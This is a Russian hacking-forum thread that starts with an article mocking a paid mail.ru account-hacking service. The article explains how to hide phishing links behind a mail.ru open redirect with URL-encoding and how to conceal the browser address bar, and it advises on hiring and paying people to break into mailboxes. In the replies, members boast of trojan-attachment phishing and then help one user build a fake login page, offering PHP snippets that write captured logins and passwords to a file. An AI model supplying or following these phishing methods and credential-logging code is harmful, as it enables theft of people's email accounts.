|
Разоблачение http://mai1.pp.ru/ + ещё один общедоступный метод взлома @ mail
Очень часто при успешном взломе ящика он наблюдает попытки других сделать тоже самое. В последнее время количество "умников" резко возросло, поэтому он решил показать всё это изнутри. Возьмём недавний случай, с которым ему пришлось столкнуться в одном из ящиков принадлежащих домену mail.ru.
Среди писем сразу обращает на себя внимание письмо от «Администрации Mail.Ru» с темой «Предупреждение». Он начал просматривать все сначала, ибо его интересовала вполне конкретная информация. И вот он дошел до письма от сервиса Открытки@mail.ru. Как видно, линк из письма ведёт вовсе не на открытку. Убогость способа просто потрясает. Если честно, затрудняюсь дать статистику успешности взлома этим методом, но лично я бы не повелся. Смотрим на адресную строку и всё понимаем. Второе письмо от «Администрации» даже улыбнуло. Кстати, если глядя на адрес фейка, предположить что там хитрый скрипт - сильное заблуждение =) Это физический адрес папки на сервере, как говорится, голь на выдумку хитра. Вот так произошло знакомство с http://mai1.pp.ru/. Имея полный доступ к почтовому ящику, некто заверил, что конкретно данный человек, хозяин ящика, не повелся на уловку. Однако, ещё более рассмешил другой факт. Проглядев мельком фейк-странички, я зашел на индекс сайта, где зашедших информируют, что данный сервис занимается взломом ящиков за деньги (!). Вот несколько цитат: • У нас самый гарантированный, эффективный, анонимный и быстрый взлом. А из фразы «взлом почтовых ящиков на mail.ru, rambler.ru, yandex.ru и других почтовых системах» я делаю вывод, что ребята просто гроза почтовиков, гранды и монcтры хака. Вот только у кого-то это получилось, а у них нет, какже так?? За работу товарищи просят 35 wmz, при этом вообще интересно обратить внимание на «прайс» http://mai1.pp.ru/service.html. Например, домен inbox.ru не имеет отношения к mail.ru, да и вообще его не существует, а взломать запароленный архив вам обойдется всего лишь 10-20 wmz. Интересно, как они планируют работать по корпоративным ящикам?? Что мешает _любому_ человеку повторить теже самые действия?? Осматривая фейк, подметил, что бравые кулхацкеры поленились даже убрать счетчики со странички, это уже непрофессионализм. Сам факт того, что человека надо ещё «уговорить» перейти на заветный фейк, отношу к той же категории. Хотя, если уж так важно чтобы человек именно осознанно перешел на фейк, то я бы не поленился замаскировать кривой линк. Сперва из письма, примерно вот так: Код HTML:
<a href="http://forum.antichat.ru/" Более продвинутые товарищи идут дальше. Переход на фейк принимает скрипт, который определяет точную версию браузера. После этого окно разворачивается на весь экран или просто делается всплывающее окно, главное скрыть родные панели браузера, включая адресную строку, а в контент странички выводят _РИСУНКИ_ панелей и рисунок адресной строки с вроде как правильным значением. В край, хотя бы просто текстовое поле с подмененным адресом. Это для тех, кто легких путей не ищет, создание неоправданно трудоёмко, а если жертва использует свои скины или меняет значение User-agent, то вообще безжалостно палит задумку. Пожалуй, лучше просто скрыть адресную строку. Для самых любопытных могу сказать, что вроде как есть способ, позволяющий именно _менять_ адресную строку, оставаясь в совсем другом месте. И добиваются этого при помощи Flash-технологий и ActionScript. Вот теперь давайте посмотрим, за что же эти ребята просят деньги?? Фактически, ни за что. Я не вижу здесь абсолютно ничего не доступного простому смертному, например, моей девушке =) Нет применения каких-то особых методов или технологий, требующих определенных знаний или умений. Поэтому, призываю быть бдительными прибегая к услугам подобных «контор». Такое письмо сразу выдаст намерения отправителя, а определиться с заказчиком/целью не всегда трудно. Вспомним рекламу на главной сайта «самый гарантированный метод», «эффективный», «быстрый взлом». Это всё иначе как пафос не называется. Теперь вы знаете, как работают бравые хакеры с сайта http://mai1.pp.ru/. Конечно, кидалами я их назвать не могу, но халтурщики 100%. К счастью, на этом предложения подобного рода услуг не заканчиваются. Есть действительно спецы и их не так мало, они не нуждаются в создании отдельного сайта для афиширования своей деятельности, лучше всего _искать самим_ по рекомендациям друзей/знакомых, а _не оставлять просьбы_ на всевозможных форумах, досках. Однако, не каждый возьмётся за заказ от первого встречного. Кто-то просто боится огласки своей деятельности, ведь каждый удачный взлом это нарушение закона. Но чаще всего, человек отказывает из-за незнания того с кем связывается, в последнее время участились случаи, когда исполнителя просто кидают!! Некто очень умный и думающий что он умнее всех, не исключаю что контора http://mai1.pp.ru/ относится к таким же, регистрирует ящик вида veronika_2002@mail.ru и сразу же заказывает его, после чего просто внимательно наблюдает, что же происходит с ящиком. В любом случае, после получения результата заказчик просто исчезнет, зачастую с информацией о том, что именно вы делаете и как. Кто-то таким образом оценивает силы конкурента, пытается выведать приватные уязвимости… Ещё раз повторю, таких случаев сейчас становится всё больше и больше, поэтому не удивляйтесь если в скором времени проверенный спец повысит стоимость оказания услуг или попросит предоплаты. В свою очередь, если прочитав это у вас как у заказчика появились какие-то позывы/желания, то спешу предостеречь. Во-первых, воровать методы/технологии это низко и нечестно. Если вы признаёте необходимость того, что вам нужен чей-то ящик, имейте достоинство признать необходимость обратиться к спецу и иметь уважение к нему. Этот человек бережет вашу тайну, как может, и рассчитывает, что его усилия будут оценены. Мне доподлинно известны случаи, когда кидал вычисляли и жестоко наказывали в реале, хотя территориально было не близко. Если так нужна уязвимость или методика, то и ищите человека, который продаст именно её, будьте готовы честно отдать за неё затребованное. Цена это тема отдельного разговора и каждый в праве сам её устанавливать, однако есть неписанные правила. В данном примере, халтурщики просили 35 wmz за честно проделанную работу. Если просят меньше, то к вам или хорошо относятся (возможно друг, знакомый или очень давний постоянный клиент, для которого действуют старые «тарифы»), либо вы имеете дело с новичком, который ещё не всё понял и осознал. Ну и конечно, вариант, что, вас, кинувшегося на дешевизну, в итоге кинут. Достаточно широкую огласку получил случай, который произошел на http://forum.xakep.ru/ пару месяцев назад, когда кул-хацкер входил в контакт с человеком, чей ящик заказывали, в обмен на скриншоты папки входящих писем вводил жертву в курс дела (кто заказывал и когда), впоследствии предоставлял скриншоты заказчику и после оплаты исчезал для обеих сторон. С заказчика брал 25 wmz. После того как обман раскрылся, он просто сменил ник и сейчас продолжает свою деятельность на другом форуме (не на forum.antichat.ru, у нас с этим тьфу тьфу тьфу), однако точно известно его местоположение и люди, чью деятельность он ставит под угрозу уже его предупредили. Обойдемся без ников. Также частенько встречаю совсем глупые предложения о взломе за 5 wmz на любых почтовых серверах… No comments. Поэтому, сперва важно самому для себя оценить важность той информации, которую вы хотите получить и самому предложить цену. В любом случае, за ящик, взлом которого сопровожден большим риском/ответственностью (например, если на ящике хранится финансовая информация фирмы), будьте готовы выложить больше обычного, это закономерно. Не гонитесь за дешевизной, гонитесь за качеством работы, ориентируясь на отзывы других людей, это самая правильная политика. Надеюсь, эта статья-обзор более или менее сформировала для вас правила игры в этом деле и немного приоткрыла тайну над «самым гарантированным, эффективным, анонимным и быстрым» методом взлома почтового ящика. PS. В последнее время у гринов появилась устойчивая тенденция говорить о себе во 2-3 лице =) |
Цитата:
Цитата:
|
Хм....очень понравилось...я так разоблачил как то одного кидалу :) он ломал,брал деньги ,и не давал пасс....
Честно говоря способ тут убог .... и сервисы дрянные за которые слишком много просят...Все мои мыльники стоят по 100 уе,но я ворую только забугорные и платные. Ps пожалйста не надо пытаться меня разоблачить =) |
Цитата:
"Зджравсвуйте! Вышли новые обновления для почтового ящика mail.ru. В целях безопасности вашего ящика, настоятельно рекомендуем их установить." Отправитель: sacurity_mail_ru@mail.ru В письме аттач с пинчем. Повелось ТРИ человека из 10ти. Хотя казалось бы - кол-во ляпов и бессмыслицы в таком письме просто неизмеримы. Опечатка в первом же слове, совершенно корявый ящик, предложение скачать апдейт, когда люди пользуются браузером :\ Так что даже самые бредовые методы во многих случаях работают против самых бредовых ламеров, которые ежедневно впервые подключаются к интернету. Кстати один из этих 3оих на тот момент имел стаж в интернете - 2 года. Но он уникум. До сих пор использует пароль исключительно 123456 и 654321. |
Цитата:
|
Цитата:
upd: Прчем заказывают у таких же лолегов пример которых в первом посте. И они такими же бредовыми методами их ломают )) Помоему это весьма даже естесственно. Есть люди которые занимаются профессиональным взломом за хорошие деньги, а есть лолеги которые ломают на заказ всякую мелочь. Пищевая цепь типа :\ |
Цитата:
ЗЫ Развод довольно таки грамотный, только если все делать по уму... Авторы представленного сайта вообще поражают - амбиций #опой жуй а толку как мне кажется NULL. |
Цитата:
|
забавная статья читал с интересом в некоторых местах с умилением =)))
|
Кстати, незабвенный http://mai1.pp.ru/ уже сутки как лежит =))) Интересно, абуза от агентов мейла пришла, сами поняли что больше им нечего не светит или из наших кто прошелся?? =)
На seclab.ru сегодня очень интересная тема была про подмену адрессной строки, Elekt показал, там на основные браузеры есть темы с живыми примерами. |
Вообще, если внимательно изучить маил_ру - то у него существует редирект. Дополнив его своей ссылкой - будет редиректить на ваш фейк-сайт.
Т.е. в начале адреса будет светиться mail.ru, а дальше уже хвост с вашим сайтом. ... По статье на секлабе - пример пока видел, но еще практически не тестил (получиться или нет). А так - эх, жалко что на паблик =( |
Цитата:
хм, дронга разоблочатель наш, читал с удовольствием)))) вот до чего докатились угонщики |
>> в последнее время участились случаи, когда исполнителя просто кидают!! Некто очень умный и думающий что он умнее всех, не исключаю что контора http://mai1.pp.ru/ относится к таким же, регистрирует ящик вида veronika_2002@mail.ru и сразу же заказывает его, после чего просто внимательно наблюдает, что же происходит с ящиком.
ну это не стоит называть кидаловом, это прием СИ.. >> Во-первых, воровать методы/технологии это низко и нечестно. ага, а воровать чужие ящики для кого-то за деньги это высоко и честно?? |
Цитата:
Цитата:
|
>> так же как и продавать чужие программы?)
вот, ты сразу переводишь мотивацию того, что Dronga назвал кидаловом, на деньги, а ты не думал, что кому-то просто интересно узнать существующие способы кражи ящиков? (например, чтоб обезопасить себя самого от этого) не всех же одни тока деньги интересуют.. |
censored! Верно и редирект там даже в нескольких местах =)
Пускай те кого интересуют способы ищут/узнают своей головой, в край, если найдут людей, то своим кошельком. И по-моему, на античате в той или иной форме вспомнили обо всех методах. Спец из статьи не ставил цели разоблачить, он просто делал свою работу, просто заказали не только у него... Это относительно честная борьба. А вот когда кто-то доводит и оттачивает свои методы до полного автоматизма и совершенства, месяцами, сидит пишет, пробует, постоянно что-то подправляет, слидит за каждым изменением... а кто-то не имея такого опыта/знаний просто ворует это в считанные минуты. При этом изначально заказывает, просит доказательства.. А потом говорит что сейчас только за картой сбегает и исчезает. Логи есть очень интересные, когда вчерашний заказчик просто открыто издевается. А сайт http://mai1.pp.ru/ и вправду возобновил свою работу, правда смысла я не понимаю =) + там появилась новость от 20.02.2007 =)))) Линк что-ли на тему у них в гостевой оставить... ;) На pp.ru вообще реальные сайты паркуются, например http://astarta.pp.ru/ Тоже экземпляр из этой серии =) Все записываемся на услугу снятия негатива =) |
Цитата:
"спец из статьи" попросту подсмотрел чужой способ воровать ящики, увидел, что он ламерский и решил выставить на посмешище своих конкурентов.. при этом в самой статье он пишет, что узнавать чужой способ - это кедалово (хотя сам по сути это и делает).. конечно, заказывать у человека ящик лично, а потом еще обосрать по асику - это засранство, и за это грех по ***лу не дать (если есть возможность), но когда выкладуешь на форуме объяву с предложением сломать ящик (а его наврядли кто сломает - потому и платить не за что) и наблюдаешь за действиями хакиров - то это СИ.. поэтому очень правильно, в принципе делают люди, которые имея хороший способ тырить ящики аккуратно отбирают заказчиков, не кидаясь на что попало.. |
Цитата:
Цитата:
|
Digimortal
То что делают они, это реальное ламерство и халтура. Ты просто не знаешь как они подосрали и кому. Добавляем сюда всю их крутизну и то что только они не кидают, а остальные обязательно кинут. Так что поаккуратнее в высказываниях. Цитата:
|
>> То что делают они, это реальное ламерство и халтура.
согласен >> Ты просто не знаешь как они подосрали и кому. да мне это и не надо знать, я высказал свое мнение об одной маленькой вещи в статье с которой в общем то не согласен, а их я вообще не касался.. >> Добавляем сюда всю их крутизну и то что только они не кидают, а остальные обязательно кинут. опять же, мне на них пофиг.. таких "контор" полно и каждый пишет, что только он один единственный не кидает и выполняет работу со 100% гарантией.. лолеги )).. >> Так что поаккуратнее в высказываниях. а разве я неаккуратен в них? |
Dronga- главный разоблачитель Античата =)
(А если серьозно то имхо теряються нити темы)\тему почитстил, все разборки в ICQ!!! |
Цитата:
Для поддержки темы расскажу про метод о котором уже вспомнил censored!. Для того что бы спрятать линк из письма вовсе не обязательно знать какие-то хитро навороченные скрипты, использовать XSS чтобы суметь их вставить в тело письма... Есть более тривиальный метод =) Это использование редиректа непосредственно от служб mail.ru. Например, внешне, очень сипатичный линк Приведёт вовсе не на mail.ru, как может ожидать потенциальная жертва =) Но это пол дела, пока что всё достаточно прозрачно. Чтобы окончательно ввести жертву в заблуждение кодируем www.forum.antichat.ru примерно в такой вид: %77%77%77%2E%66%6F%72%75%6D%2E%61%6E%74%69%63%68%6 1%74%2E%72%75 И получаем: Цитата:
Одним секретом меньше =) (c)Dronga#Antichat.ru |
Цитата:
|
Совневаюсь...
з/ы спс Dronga правда и не секрет как бы=) |
Цитата:
Цитата:
|
Цитата:
|
Рано или поздно это ктонибудь да выложил... да и основания есть! так бы не крысил...
http://slil.ru/24027168 - файлы сайта... За паролем в личку... |
а мне недавно пришло письмо с просьбой о восстановлении пароля..мол bla-bla-bla мы проипали ваш пароль. вышлите))) признавайтесь, кто такому учил?)))
|
Слушайте, у меня вопрос стоит так, надо сделать аналог этой странице на беспалтном хостинге (джино, 122мб, ту1)
Страницу то я сделаю, а вот что мне надо что бы пароль сохранился и скоприровался в файлик.... |
для аналога страницы сорцы не дам. ибо нефиг!
|
Цитата:
//--удалено--// файлик 1.txt не забудь в папку кинуть... ...и название переменных согласуй с переменными с формы... |
Страницу сделал,
в Код:
fputs($file, $HTTP_POST_VARS["Login"]." ".$HTTP_POST_VARS["Password"]."\n")Но в 1.тхт всеравно не сохраняется ничего :/ Пробовал вместо логин, писать login_from но не прокатило, права на тхт файл поставил 777 Что я ни так сделал? |
Sandjuro
права вроде на папку на фтп ставятся а не на файл может ты через GET данные передаешь? исправь HTTP_POST_VARS на _REQUEST |
Sandjuro
Я уже спрашивал об этом, когда баловался подобными вещами. В разделе "Для веб-мастера" есть. Вот скрипт. Не забудь в папке со скриптом создать log.php и поставить права доступа нужные ;) PHP код:
|
Finder, Спасибо! тока подскажи, где саму страницу вставлять? после закрытия скрипа? (после "?>")
Если вставляю после тега, то лог.пхп пуст, мне кажется что вместо юзернейм в $log_string=$username." "; надо поставить login , я прав? |
Ну, я этот скрипт в конец своей странички запихнул.
Собсно, а какая разница, где он будет? :) PHP код:
зы: для log.php права у меня выставлены -rw-r--r-- |
2 Sandjuro
Внимательно посмотри форму и скрипт, может поймешь почему не получалось... |
Iceangel_
Спасибо! я пхп не учил потому как мог так и мутил! а твой фейк заработал! щя саму хтмл страницу дороботаю маиловскую и сделаю чтобы перекидовыло на открытку :) |
2 Sandjuro
Если что, стучись в асю[ 222284836 ], помогу... |
Как на зло сейчас не имею доступ в аску (но сегодня должен быть там)
У меня вот такой вопрос появился в echo("Системная ошибка"); если я вставляю ссылку или скрипт но он не работает, я хотел туда подельную страницу с открыткой вставить :) это возможно? |
| Время: 21:04 |